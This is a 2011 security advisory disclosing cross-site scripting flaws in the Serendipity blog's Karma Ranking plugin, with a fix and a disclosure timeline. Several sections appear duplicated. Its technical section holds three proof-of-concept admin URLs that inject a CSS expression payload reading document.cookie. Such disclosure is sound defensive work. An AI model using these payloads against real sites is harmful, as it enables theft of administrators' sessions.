SSCHADV2011-017 - Serendipity Plugin 'Karma Ranking' Multiple Cross-Site Scripting vulnerabilities
Advisory:
|
Serendipity Plugin ‘Karma Ranking’ Multiple Cross-Site Scripting vulnerabilities
|
Advisory ID:
|
SSCHADV2011-017
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Serendipity 1.5.5 with Karma Ranking Plugin version 1.1
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
-
|
======================
Vulnerability Description:
======================
Multiple parameters in the Karma Ranking plugin (Serendipity backend) are prone to a Cross-Site Scripting vulnerability
Vulnerability Description:
======================
Multiple parameters in the Karma Ranking plugin (Serendipity backend) are prone to a Cross-Site Scripting vulnerability
==============
Technical Details:
==============
Successfully tested with Internet Explorer 8
Technical Details:
==============
Successfully tested with Internet Explorer 8
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=’ stYle=‘x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][ip]=3&serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!+-
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=’ stYle=‘x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][title]=3&serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!+-
http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=karmalog&serendipity[adminAction]=karmalog&serendipity[adminModule]=event_display&serendipity[filter][entryid]=3&serendipity[filter][ip]=3&serendipity[filter][title]=’ stYle=‘x:expre/**/ssion(alert(document.cookie)) &serendipity[filter][user_agent]=3&serendipity[sort][order]=votetime&serendipity[sort][ordermode]=DESC&submit=-+Go!+-
|
=====
Solution:
=====
Upgrade to Serendipity 1.6
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
27-Oct-2011 – fixed by vendor
02-Nov-2011 – release date of this security advisory
02-Nov-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org
http://blog.s9y.org/archives/233-Serendipity-1.6-released.html
http://www.rul3z.de/advisories/SSCHADV2011-017.txt
Solution:
=====
Upgrade to Serendipity 1.6
================
Disclosure Timeline:
================
22-Sep-2011 – informed developers
27-Oct-2011 – fixed by vendor
02-Nov-2011 – release date of this security advisory
02-Nov-2011 – post on BugTraq
====
Credits:
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References:
=======
http://www.s9y.org
http://blog.s9y.org/archives/233-Serendipity-1.6-released.html
http://www.rul3z.de/advisories/SSCHADV2011-017.txt
Comments
Display comments as Linear | Threaded